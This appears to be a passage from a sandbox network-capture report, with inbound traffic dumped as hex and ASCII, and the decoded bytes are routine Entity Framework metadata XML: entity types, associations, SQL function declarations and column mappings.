2023-11-18 09:02:37 UTC	691	IN	Data Raw: 68 22 20 54 79 70 65 3d 22 69 6e 74 22 20 2f 3e 0a 20 20 20 20 3c 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 50 72 65 63 69 73 69 6f 6e 22 20 54 79 70 65 3d 22 69 6e 74 22 20 2f 3e 0a 20 20 20 20 3c 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 44 61 74 65 54 69 6d 65 50 72 65 63 69 73 69 6f 6e 22 20 54 79 70 65 3d 22 69 6e 74 22 20 2f 3e 0a 20 20 20 20 3c 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 53 63 61 6c 65 22 20 54 79 70 65 3d 22 69 6e 74 22 20 2f 3e 0a 20 20 20 20 3c 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 43 6f 6c 6c 61 74 69 6f 6e 43 61 74 61 6c 6f 67 22 20 54 79 70 65 3d 22 6e 76 61 72 63 68 61 72 22 20 2f 3e 0a 20 20 20 20 3c 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 43 6f 6c 6c 61 74 69 6f 6e 53 63 68 65 6d 61 22 20 54 79 70 65 3d Data Ascii: h" Type="int" /> <Property Name="Precision" Type="int" /> <Property Name="DateTimePrecision" Type="int" /> <Property Name="Scale" Type="int" /> <Property Name="CollationCatalog" Type="nvarchar" /> <Property Name="CollationSchema" Type=
2023-11-18 09:02:37 UTC	695	IN	Data Raw: 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 49 64 22 20 4e 75 6c 6c 61 62 6c 65 3d 22 66 61 6c 73 65 22 20 54 79 70 65 3d 22 6e 76 61 72 63 68 61 72 22 20 2f 3e 0a 20 20 20 20 3c 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 45 78 70 72 65 73 73 69 6f 6e 22 20 4e 75 6c 6c 61 62 6c 65 3d 22 74 72 75 65 22 20 54 79 70 65 3d 22 6e 76 61 72 63 68 61 72 22 20 2f 3e 0a 20 20 3c 2f 45 6e 74 69 74 79 54 79 70 65 3e 0a 0a 20 20 3c 45 6e 74 69 74 79 54 79 70 65 20 4e 61 6d 65 3d 22 43 6f 6e 73 74 72 61 69 6e 74 43 6f 6c 75 6d 6e 22 3e 0a 20 20 20 20 3c 4b 65 79 3e 0a 20 20 20 20 20 20 3c 50 72 6f 70 65 72 74 79 52 65 66 20 4e 61 6d 65 3d 22 43 6f 6e 73 74 72 61 69 6e 74 49 64 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 72 6f 70 65 72 74 79 52 65 66 20 4e 61 6d 65 3d 22 Data Ascii: Property Name="Id" Nullable="false" Type="nvarchar" /> <Property Name="Expression" Nullable="true" Type="nvarchar" /> </EntityType> <EntityType Name="ConstraintColumn"> <Key> <PropertyRef Name="ConstraintId" /> <PropertyRef Name="
2023-11-18 09:02:37 UTC	698	IN	Data Raw: 31 22 20 2f 3e 0a 20 20 20 20 3c 45 6e 64 20 54 79 70 65 3d 22 53 65 6c 66 2e 46 6f 72 65 69 67 6e 4b 65 79 22 20 52 6f 6c 65 3d 22 46 6f 72 65 69 67 6e 4b 65 79 22 20 4d 75 6c 74 69 70 6c 69 63 69 74 79 3d 22 2a 22 20 2f 3e 0a 20 20 20 20 3c 52 65 66 65 72 65 6e 74 69 61 6c 43 6f 6e 73 74 72 61 69 6e 74 3e 0a 20 20 20 20 20 20 3c 50 72 69 6e 63 69 70 61 6c 20 52 6f 6c 65 3d 22 43 6f 6e 73 74 72 61 69 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 50 72 6f 70 65 72 74 79 52 65 66 20 4e 61 6d 65 3d 22 49 64 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 50 72 69 6e 63 69 70 61 6c 3e 0a 20 20 20 20 20 20 3c 44 65 70 65 6e 64 65 6e 74 20 52 6f 6c 65 3d 22 46 6f 72 65 69 67 6e 4b 65 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 50 72 6f 70 65 72 74 79 52 65 66 20 4e 61 6d 65 3d Data Ascii: 1" /> <End Type="Self.ForeignKey" Role="ForeignKey" Multiplicity="*" /> <ReferentialConstraint> <Principal Role="Constraint"> <PropertyRef Name="Id" /> </Principal> <Dependent Role="ForeignKey"> <PropertyRef Name=
2023-11-18 09:02:37 UTC	702	IN	Data Raw: 3e 0a 20 20 20 20 20 20 3c 2f 44 65 70 65 6e 64 65 6e 74 3e 0a 20 20 20 20 3c 2f 52 65 66 65 72 65 6e 74 69 61 6c 43 6f 6e 73 74 72 61 69 6e 74 3e 0a 20 20 3c 2f 41 73 73 6f 63 69 61 74 69 6f 6e 3e 0a 0a 20 20 3c 41 73 73 6f 63 69 61 74 69 6f 6e 20 4e 61 6d 65 3d 22 46 72 6f 6d 46 6f 72 65 69 67 6e 4b 65 79 56 69 65 77 43 6f 6c 75 6d 6e 22 3e 0a 20 20 20 20 3c 45 6e 64 20 54 79 70 65 3d 22 53 65 6c 66 2e 56 69 65 77 43 6f 6c 75 6d 6e 22 20 52 6f 6c 65 3d 22 43 6f 6c 75 6d 6e 22 20 4d 75 6c 74 69 70 6c 69 63 69 74 79 3d 22 31 22 20 2f 3e 0a 20 20 20 20 3c 45 6e 64 20 54 79 70 65 3d 22 53 65 6c 66 2e 46 6f 72 65 69 67 6e 4b 65 79 22 20 52 6f 6c 65 3d 22 46 6f 72 65 69 67 6e 4b 65 79 22 20 4d 75 6c 74 69 70 6c 69 63 69 74 79 3d 22 2a 22 20 2f 3e 0a 20 20 20 Data Ascii: > </Dependent> </ReferentialConstraint> </Association> <Association Name="FromForeignKeyViewColumn"> <End Type="Self.ViewColumn" Role="Column" Multiplicity="1" /> <End Type="Self.ForeignKey" Role="ForeignKey" Multiplicity="*" />
2023-11-18 09:02:37 UTC	706	IN	Data Raw: 20 20 20 3c 45 6e 64 20 52 6f 6c 65 3d 22 43 6f 6e 73 74 72 61 69 6e 74 22 20 45 6e 74 69 74 79 53 65 74 3d 22 56 69 65 77 43 6f 6e 73 74 72 61 69 6e 74 73 22 2f 3e 0a 20 20 20 20 3c 2f 41 73 73 6f 63 69 61 74 69 6f 6e 53 65 74 3e 0a 20 20 20 20 3c 41 73 73 6f 63 69 61 74 69 6f 6e 53 65 74 20 4e 61 6d 65 3d 22 46 72 6f 6d 56 69 65 77 46 6f 72 65 69 67 6e 4b 65 79 43 6f 6c 75 6d 6e 73 22 20 41 73 73 6f 63 69 61 74 69 6f 6e 3d 22 53 65 6c 66 2e 46 72 6f 6d 46 6f 72 65 69 67 6e 4b 65 79 43 6f 6c 75 6d 6e 22 20 3e 0a 20 20 20 20 20 20 3c 45 6e 64 20 52 6f 6c 65 3d 22 43 6f 6c 75 6d 6e 22 20 45 6e 74 69 74 79 53 65 74 3d 22 56 69 65 77 43 6f 6c 75 6d 6e 73 22 2f 3e 0a 20 20 20 20 20 20 3c 45 6e 64 20 52 6f 6c 65 3d 22 46 6f 72 65 69 67 6e 4b 65 79 22 20 45 6e Data Ascii: <End Role="Constraint" EntitySet="ViewConstraints"/> </AssociationSet> <AssociationSet Name="FromViewForeignKeyColumns" Association="Self.FromForeignKeyColumn" > <End Role="Column" EntitySet="ViewColumns"/> <End Role="ForeignKey" En
2023-11-18 09:02:37 UTC	710	IN	Data Raw: 20 20 20 3c 2f 4b 65 79 3e 0a 20 20 20 20 3c 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 49 64 22 20 4e 75 6c 6c 61 62 6c 65 3d 22 66 61 6c 73 65 22 20 54 79 70 65 3d 22 53 74 72 69 6e 67 22 20 20 2f 3e 0a 20 20 20 20 3c 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 4e 61 6d 65 22 20 4e 75 6c 6c 61 62 6c 65 3d 22 66 61 6c 73 65 22 20 54 79 70 65 3d 22 53 74 72 69 6e 67 22 20 20 2f 3e 0a 20 20 20 20 3c 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 4f 72 64 69 6e 61 6c 22 20 4e 75 6c 6c 61 62 6c 65 3d 22 66 61 6c 73 65 22 20 54 79 70 65 3d 22 49 6e 74 33 32 22 20 2f 3e 0a 20 20 20 20 3c 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 50 61 72 61 6d 65 74 65 72 54 79 70 65 22 20 4e 75 6c 6c 61 62 6c 65 3d 22 66 61 6c 73 65 22 20 54 79 70 65 3d 22 53 65 6c 66 2e Data Ascii: </Key> <Property Name="Id" Nullable="false" Type="String" /> <Property Name="Name" Nullable="false" Type="String" /> <Property Name="Ordinal" Nullable="false" Type="Int32" /> <Property Name="ParameterType" Nullable="false" Type="Self.
2023-11-18 09:02:37 UTC	714	IN	Data Raw: 41 73 73 6f 63 69 61 74 69 6f 6e 20 4e 61 6d 65 3d 22 52 6f 75 74 69 6e 65 50 61 72 61 6d 65 74 65 72 22 3e 0a 20 20 20 20 3c 45 6e 64 20 54 79 70 65 3d 22 53 65 6c 66 2e 52 6f 75 74 69 6e 65 22 20 52 6f 6c 65 3d 22 52 6f 75 74 69 6e 65 22 20 4d 75 6c 74 69 70 6c 69 63 69 74 79 3d 22 31 22 20 2f 3e 0a 20 20 20 20 3c 45 6e 64 20 54 79 70 65 3d 22 53 65 6c 66 2e 50 61 72 61 6d 65 74 65 72 22 20 52 6f 6c 65 3d 22 50 61 72 61 6d 65 74 65 72 22 20 4d 75 6c 74 69 70 6c 69 63 69 74 79 3d 22 2a 22 20 2f 3e 0a 20 20 3c 2f 41 73 73 6f 63 69 61 74 69 6f 6e 3e 0a 0a 3c 2f 53 63 68 65 6d 61 3e 68 9b 00 00 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0a 0a 3c 21 2d 2d 0a 2f 2a 2a 2a 2a 2a 2a 2a 2a 2a Data Ascii: Association Name="RoutineParameter"> <End Type="Self.Routine" Role="Routine" Multiplicity="1" /> <End Type="Self.Parameter" Role="Parameter" Multiplicity="" /> </Association></Schema>h<?xml version="1.0" encoding="utf-8"?>.../********
2023-11-18 09:02:37 UTC	719	IN	Data Raw: 41 67 67 72 65 67 61 74 65 3d 22 74 72 75 65 22 20 42 75 69 6c 74 49 6e 3d 22 74 72 75 65 22 3e 0a 20 20 20 20 20 20 3c 52 65 74 75 72 6e 54 79 70 65 20 54 79 70 65 3d 22 44 6f 75 62 6c 65 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 3d 22 61 72 67 22 20 54 79 70 65 3d 22 43 6f 6c 6c 65 63 74 69 6f 6e 28 44 6f 75 62 6c 65 29 22 20 4d 6f 64 65 3d 22 49 6e 22 20 2f 3e 0a 20 20 20 20 3c 2f 46 75 6e 63 74 69 6f 6e 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 43 4f 55 4e 54 20 2d 2d 3e 0a 20 20 20 20 3c 46 75 6e 63 74 69 6f 6e 20 4e 61 6d 65 3d 22 43 4f 55 4e 54 22 20 41 67 67 72 65 67 61 74 65 3d 22 74 72 75 65 22 20 42 75 69 6c 74 49 6e 3d 22 74 72 75 65 22 3e 0a 20 20 20 20 20 20 3c 52 65 74 75 72 6e 54 79 70 65 20 54 79 70 65 3d 22 Data Ascii: Aggregate="true" BuiltIn="true"> <ReturnType Type="Double" /> <Parameter Name="arg" Type="Collection(Double)" Mode="In" /> </Function> ... COUNT --> <Function Name="COUNT" Aggregate="true" BuiltIn="true"> <ReturnType Type="
2023-11-18 09:02:37 UTC	723	IN	Data Raw: 43 6f 6c 6c 65 63 74 69 6f 6e 28 49 6e 74 31 36 29 22 20 4d 6f 64 65 3d 22 49 6e 22 20 2f 3e 0a 20 20 20 20 3c 2f 46 75 6e 63 74 69 6f 6e 3e 0a 20 20 20 20 3c 46 75 6e 63 74 69 6f 6e 20 4e 61 6d 65 3d 22 4d 49 4e 22 20 41 67 67 72 65 67 61 74 65 3d 22 74 72 75 65 22 20 42 75 69 6c 74 49 6e 3d 22 74 72 75 65 22 3e 0a 20 20 20 20 20 20 3c 52 65 74 75 72 6e 54 79 70 65 20 54 79 70 65 3d 22 49 6e 74 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 3d 22 61 72 67 22 20 54 79 70 65 3d 22 43 6f 6c 6c 65 63 74 69 6f 6e 28 49 6e 74 33 32 29 22 20 4d 6f 64 65 3d 22 49 6e 22 20 2f 3e 0a 20 20 20 20 3c 2f 46 75 6e 63 74 69 6f 6e 3e 0a 20 20 20 20 3c 46 75 6e 63 74 69 6f 6e 20 4e 61 6d 65 3d 22 4d 49 4e 22 20 41 67 67 72 65 67 61 74 Data Ascii: Collection(Int16)" Mode="In" /> </Function> <Function Name="MIN" Aggregate="true" BuiltIn="true"> <ReturnType Type="Int32" /> <Parameter Name="arg" Type="Collection(Int32)" Mode="In" /> </Function> <Function Name="MIN" Aggregat
2023-11-18 09:02:37 UTC	727	IN	Data Raw: 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 3d 22 73 74 72 53 65 61 72 63 68 22 20 54 79 70 65 3d 22 53 74 72 69 6e 67 22 20 4d 6f 64 65 3d 22 49 6e 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 3d 22 73 74 72 54 61 72 67 65 74 22 20 54 79 70 65 3d 22 53 74 72 69 6e 67 22 20 4d 6f 64 65 3d 22 49 6e 22 20 2f 3e 0a 20 20 20 20 3c 2f 46 75 6e 63 74 69 6f 6e 3e 0a 20 20 20 20 3c 46 75 6e 63 74 69 6f 6e 20 4e 61 6d 65 3d 22 43 48 41 52 49 4e 44 45 58 22 20 42 75 69 6c 74 49 6e 3d 22 74 72 75 65 22 3e 0a 20 20 20 20 20 20 3c 52 65 74 75 72 6e 54 79 70 65 20 54 79 70 65 3d 22 49 6e 74 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 3d 22 73 74 72 53 65 61 72 63 68 22 20 54 79 Data Ascii: <Parameter Name="strSearch" Type="String" Mode="In" /> <Parameter Name="strTarget" Type="String" Mode="In" /> </Function> <Function Name="CHARINDEX" BuiltIn="true"> <ReturnType Type="Int32" /> <Parameter Name="strSearch" Ty
2023-11-18 09:02:37 UTC	730	IN	Data Raw: 76 61 72 63 68 61 72 0a 20 20 20 20 20 20 20 20 2d 2d 3e 0a 20 20 20 20 3c 46 75 6e 63 74 69 6f 6e 20 4e 61 6d 65 3d 22 4c 54 52 49 4d 22 20 42 75 69 6c 74 49 6e 3d 22 74 72 75 65 22 3e 0a 20 20 20 20 20 20 3c 52 65 74 75 72 6e 54 79 70 65 20 54 79 70 65 3d 22 53 74 72 69 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 3d 22 73 74 72 22 20 54 79 70 65 3d 22 53 74 72 69 6e 67 22 20 4d 6f 64 65 3d 22 49 6e 22 20 2f 3e 0a 20 20 20 20 3c 2f 46 75 6e 63 74 69 6f 6e 3e 0a 20 20 20 20 3c 46 75 6e 63 74 69 6f 6e 20 4e 61 6d 65 3d 22 4c 54 52 49 4d 22 20 42 75 69 6c 74 49 6e 3d 22 74 72 75 65 22 3e 0a 20 20 20 20 20 20 3c 52 65 74 75 72 6e 54 79 70 65 20 54 79 70 65 3d 22 53 74 72 69 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 Data Ascii: varchar --> <Function Name="LTRIM" BuiltIn="true"> <ReturnType Type="String" /> <Parameter Name="str" Type="String" Mode="In" /> </Function> <Function Name="LTRIM" BuiltIn="true"> <ReturnType Type="String" /> <P
2023-11-18 09:02:37 UTC	734	IN	Data Raw: 20 54 79 70 65 3d 22 42 69 6e 61 72 79 22 20 4d 6f 64 65 3d 22 49 6e 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 3d 22 73 74 61 72 74 22 20 54 79 70 65 3d 22 49 6e 74 36 34 22 20 4d 6f 64 65 3d 22 49 6e 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 3d 22 6c 65 6e 67 74 68 22 20 54 79 70 65 3d 22 49 6e 74 36 34 22 20 4d 6f 64 65 3d 22 49 6e 22 20 2f 3e 0a 20 20 20 20 3c 2f 46 75 6e 63 74 69 6f 6e 3e 0a 20 20 20 20 3c 46 75 6e 63 74 69 6f 6e 20 4e 61 6d 65 3d 22 53 55 42 53 54 52 22 20 42 75 69 6c 74 49 6e 3d 22 74 72 75 65 22 3e 0a 20 20 20 20 20 20 3c 52 65 74 75 72 6e 54 79 70 65 20 54 79 70 65 3d 22 53 74 72 69 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 Data Ascii: Type="Binary" Mode="In" /> <Parameter Name="start" Type="Int64" Mode="In" /> <Parameter Name="length" Type="Int64" Mode="In" /> </Function> <Function Name="SUBSTR" BuiltIn="true"> <ReturnType Type="String" /> <Parameter Na
2023-11-18 09:02:37 UTC	738	IN	Data Raw: 4e 61 6d 65 3d 22 44 41 54 45 44 49 46 46 22 20 42 75 69 6c 74 49 6e 3d 22 74 72 75 65 22 3e 0a 20 20 20 20 20 20 3c 52 65 74 75 72 6e 54 79 70 65 20 54 79 70 65 3d 22 49 6e 74 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 3d 22 64 61 74 65 70 61 72 74 22 20 54 79 70 65 3d 22 53 74 72 69 6e 67 22 20 4d 6f 64 65 3d 22 49 6e 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 3d 22 73 74 61 72 74 64 61 74 65 22 20 54 79 70 65 3d 22 54 69 6d 65 22 20 4d 6f 64 65 3d 22 49 6e 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 3d 22 65 6e 64 64 61 74 65 22 20 54 79 70 65 3d 22 53 74 72 69 6e 67 22 20 4d 6f 64 65 3d 22 49 6e 22 20 2f 3e 0a 20 20 20 20 3c 2f 46 75 6e 63 74 Data Ascii: Name="DATEDIFF" BuiltIn="true"> <ReturnType Type="Int32" /> <Parameter Name="datepart" Type="String" Mode="In" /> <Parameter Name="startdate" Type="Time" Mode="In" /> <Parameter Name="enddate" Type="String" Mode="In" /> </Funct
2023-11-18 09:02:37 UTC	742	IN	Data Raw: 20 20 20 3c 2f 46 75 6e 63 74 69 6f 6e 3e 0a 20 20 20 20 3c 46 75 6e 63 74 69 6f 6e 20 4e 61 6d 65 3d 22 44 41 59 22 20 42 75 69 6c 74 49 6e 3d 22 74 72 75 65 22 3e 0a 20 20 20 20 20 20 3c 52 65 74 75 72 6e 54 79 70 65 20 54 79 70 65 3d 22 49 6e 74 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 3d 22 64 61 74 65 22 20 54 79 70 65 3d 22 53 74 72 69 6e 67 22 20 4d 6f 64 65 3d 22 49 6e 22 20 2f 3e 0a 20 20 20 20 3c 2f 46 75 6e 63 74 69 6f 6e 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 47 45 54 44 41 54 45 28 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 73 3a 20 64 61 74 65 74 69 6d 65 20 20 20 0a 20 20 20 20 20 20 20 20 2d 2d 3e 0a 20 20 20 20 3c 46 75 6e 63 74 69 6f 6e 20 4e 61 6d 65 3d 22 47 45 54 44 41 54 45 22 Data Ascii: </Function> <Function Name="DAY" BuiltIn="true"> <ReturnType Type="Int32" /> <Parameter Name="date" Type="String" Mode="In" /> </Function> ... GETDATE() returns: datetime --> <Function Name="GETDATE"
2023-11-18 09:02:37 UTC	746	IN	Data Raw: 3c 52 65 74 75 72 6e 54 79 70 65 20 54 79 70 65 3d 22 44 6f 75 62 6c 65 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 3d 22 61 72 67 22 20 54 79 70 65 3d 22 44 6f 75 62 6c 65 22 20 4d 6f 64 65 3d 22 49 6e 22 20 2f 3e 0a 20 20 20 20 3c 2f 46 75 6e 63 74 69 6f 6e 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 44 45 47 52 45 45 53 28 20 61 72 67 20 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 72 67 3a 20 74 69 6e 79 69 6e 74 2c 20 73 6d 61 6c 6c 69 6e 74 2c 20 69 6e 74 2c 20 62 69 67 69 6e 74 2c 20 6e 75 6d 65 72 69 63 2c 20 64 65 63 69 6d 61 6c 2c 20 73 6d 61 6c 6c 6d 6f 6e 65 79 2c 20 6d 6f 6e 65 79 2c 20 72 65 61 6c 2c 20 66 6c 6f 61 74 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 73 3a 20 74 69 6e Data Ascii: <ReturnType Type="Double" /> <Parameter Name="arg" Type="Double" Mode="In" /> </Function> ... DEGREES( arg ) arg: tinyint, smallint, int, bigint, numeric, decimal, smallmoney, money, real, float returns: tin
2023-11-18 09:02:37 UTC	751	IN	Data Raw: 4e 44 22 20 42 75 69 6c 74 49 6e 3d 22 74 72 75 65 22 3e 0a 20 20 20 20 20 20 3c 52 65 74 75 72 6e 54 79 70 65 20 54 79 70 65 3d 22 49 6e 74 36 34 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 3d 22 6e 75 6d 65 72 69 63 5f 65 78 70 72 65 73 73 69 6f 6e 22 20 54 79 70 65 3d 22 49 6e 74 36 34 22 20 4d 6f 64 65 3d 22 49 6e 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 3d 22 6c 65 6e 67 74 68 22 20 54 79 70 65 3d 22 49 6e 74 33 32 22 20 4d 6f 64 65 3d 22 49 6e 22 20 2f 3e 0a 20 20 20 20 3c 2f 46 75 6e 63 74 69 6f 6e 3e 0a 20 20 20 20 3c 46 75 6e 63 74 69 6f 6e 20 4e 61 6d 65 3d 22 52 4f 55 4e 44 22 20 42 75 69 6c 74 49 6e 3d 22 74 72 75 65 22 3e 0a 20 20 20 20 20 20 3c 52 65 74 75 72 6e 54 79 70 Data Ascii: ND" BuiltIn="true"> <ReturnType Type="Int64" /> <Parameter Name="numeric_expression" Type="Int64" Mode="In" /> <Parameter Name="length" Type="Int32" Mode="In" /> </Function> <Function Name="ROUND" BuiltIn="true"> <ReturnTyp
2023-11-18 09:02:37 UTC	755	IN	Data Raw: 73 69 6f 6e 22 20 43 6f 6c 75 6d 6e 4e 61 6d 65 3d 22 44 61 74 65 54 69 6d 65 50 72 65 63 69 73 69 6f 6e 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 63 73 3a 53 63 61 6c 61 72 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 50 72 65 63 69 73 69 6f 6e 22 20 43 6f 6c 75 6d 6e 4e 61 6d 65 3d 22 50 72 65 63 69 73 69 6f 6e 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 63 73 3a 53 63 61 6c 61 72 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 53 63 61 6c 65 22 20 43 6f 6c 75 6d 6e 4e 61 6d 65 3d 22 53 63 61 6c 65 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 63 73 3a 43 6f 6d 70 6c 65 78 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 43 6f 6c 6c 61 74 69 6f 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 63 73 3a 53 63 61 6c 61 72 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 43 61 Data Ascii: sion" ColumnName="DateTimePrecision" /> <cs:ScalarProperty Name="Precision" ColumnName="Precision" /> <cs:ScalarProperty Name="Scale" ColumnName="Scale" /> <cs:ComplexProperty Name="Collation"> <cs:ScalarProperty Name="Ca
2023-11-18 09:02:37 UTC	759	IN	Data Raw: 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 43 61 74 61 6c 6f 67 4e 61 6d 65 22 20 43 6f 6c 75 6d 6e 4e 61 6d 65 3d 22 52 65 74 75 72 6e 43 6f 6c 6c 61 74 69 6f 6e 43 61 74 61 6c 6f 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 63 73 3a 53 63 61 6c 61 72 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 53 63 68 65 6d 61 4e 61 6d 65 22 20 43 6f 6c 75 6d 6e 4e 61 6d 65 3d 22 52 65 74 75 72 6e 43 6f 6c 6c 61 74 69 6f 6e 53 63 68 65 6d 61 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 63 73 3a 53 63 61 6c 61 72 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 4e 61 6d 65 22 20 43 6f 6c 75 6d 6e 4e 61 6d 65 3d 22 52 65 74 75 72 6e 43 6f 6c 6c 61 74 69 6f 6e 4e 61 6d 65 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 2f 63 73 3a 43 6f 6d 70 6c 65 78 50 72 6f 70 65 72 Data Ascii: Property Name="CatalogName" ColumnName="ReturnCollationCatalog" /> <cs:ScalarProperty Name="SchemaName" ColumnName="ReturnCollationSchema" /> <cs:ScalarProperty Name="Name" ColumnName="ReturnCollationName" /> </cs:ComplexProper
2023-11-18 09:02:37 UTC	762	IN	Data Raw: 75 6d 6e 4e 61 6d 65 3d 22 4f 72 64 69 6e 61 6c 22 20 2f 3e 0a 20 20 20 20 20 20 3c 63 73 3a 43 6f 6d 70 6c 65 78 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 50 61 72 61 6d 65 74 65 72 54 79 70 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 63 73 3a 53 63 61 6c 61 72 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 54 79 70 65 4e 61 6d 65 22 20 43 6f 6c 75 6d 6e 4e 61 6d 65 3d 22 54 79 70 65 4e 61 6d 65 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 63 73 3a 53 63 61 6c 61 72 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 4d 61 78 4c 65 6e 67 74 68 22 20 43 6f 6c 75 6d 6e 4e 61 6d 65 3d 22 4d 61 78 4c 65 6e 67 74 68 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 63 73 3a 53 63 61 6c 61 72 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 44 61 74 65 54 69 6d 65 50 72 65 63 69 73 69 Data Ascii: umnName="Ordinal" /> <cs:ComplexProperty Name="ParameterType"> <cs:ScalarProperty Name="TypeName" ColumnName="TypeName" /> <cs:ScalarProperty Name="MaxLength" ColumnName="MaxLength" /> <cs:ScalarProperty Name="DateTimePrecisi
2023-11-18 09:02:37 UTC	763	IN	Data Raw: 70 65 72 74 79 20 4e 61 6d 65 3d 22 49 73 4d 75 6c 74 69 53 65 74 22 20 43 6f 6c 75 6d 6e 4e 61 6d 65 3d 22 49 73 4d 75 6c 74 69 53 65 74 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 63 73 3a 43 6f 6d 70 6c 65 78 50 72 6f 70 65 72 74 79 3e 0a 20 20 20 20 20 20 3c 63 73 3a 53 63 61 6c 61 72 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 4d 6f 64 65 22 20 43 6f 6c 75 6d 6e 4e 61 6d 65 3d 22 4d 6f 64 65 22 20 2f 3e 0a 20 20 20 20 20 20 3c 63 73 3a 53 63 61 6c 61 72 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 44 65 66 61 75 6c 74 22 20 43 6f 6c 75 6d 6e 4e 61 6d 65 3d 22 44 65 66 61 75 6c 74 22 20 2f 3e 0a 20 20 20 20 3c 2f 63 73 3a 45 6e 74 69 74 79 53 65 74 4d 61 70 70 69 6e 67 3e 0a 0a 20 20 20 20 3c 63 73 3a 45 6e 74 69 74 79 53 65 74 4d 61 70 70 69 6e 67 20 4e Data Ascii: perty Name="IsMultiSet" ColumnName="IsMultiSet" /> </cs:ComplexProperty> <cs:ScalarProperty Name="Mode" ColumnName="Mode" /> <cs:ScalarProperty Name="Default" ColumnName="Default" /> </cs:EntitySetMapping> <cs:EntitySetMapping N
